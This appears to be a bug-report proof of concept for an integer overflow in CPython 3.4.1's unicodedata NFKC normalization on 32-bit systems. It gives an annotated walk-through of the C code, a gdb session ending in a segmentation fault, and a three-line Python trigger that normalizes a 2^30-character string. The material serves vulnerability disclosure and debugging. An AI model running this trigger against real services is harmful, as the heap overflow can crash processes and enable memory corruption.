# Bug # --- # # static PyObject* # unicodedata_normalize(PyObject *self, PyObject *args) # { # ... # if (strcmp(form, "NFKC") == 0) { # if (is_normalized(self, input, 1, 1)) { # Py_INCREF(input); # return input; # } # return nfc_nfkc(self, input, 1); # # We need to pass the is_normalized() check (repeated \xa0 char takes care of # that). nfc_nfkc calls: # # static PyObject* # nfd_nfkd(PyObject *self, PyObject *input, int k) # { # ... # Py_ssize_t space, isize; # ... # isize = PyUnicode_GET_LENGTH(input); # /* Overallocate at most 10 characters. */ # space = (isize > 10 ? 10 : isize) + isize; # osize = space; # 1 output = PyMem_Malloc(space * sizeof(Py_UCS4)); # # 1. if isize=2^30, then space=2^30+10, so space*sizeof(Py_UCS4)=(2^30+10)*4 == # 40 (modulo 2^32), so PyMem_Malloc allocates buffer too small to hold the # result. # # Crash # ----- # # nfd_nfkd (self=, input='...', k=1) at /home/p/Python-3.4.1/Modules/unicodedata.c:552 # 552 stackptr = 0; # (gdb) n # 553 isize = PyUnicode_GET_LENGTH(input); # (gdb) n # 555 space = (isize > 10 ? 10 : isize) + isize; # (gdb) n # 556 osize = space; # (gdb) n # 557 output = PyMem_Malloc(space * sizeof(Py_UCS4)); # (gdb) print space # $9 = 1073741834 # (gdb) print space*4 # $10 = 40 # (gdb) c # Continuing. # # Program received signal SIGSEGV, Segmentation fault. # 0x40579cbb in nfd_nfkd (self=, input='', k=1) at /home/p/Python-3.4.1/Modules/unicodedata.c:614 # 614 output[o++] = code; # # OS info # ------- # # % ./python -V # Python 3.4.1 # # % uname -a # Linux ubuntu 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed Aug 14 15:31:16 UTC 2013 i686 i686 i386 GNU/Linux import unicodedata as ud s="\xa0"*(2**30) ud.normalize("NFKC", s)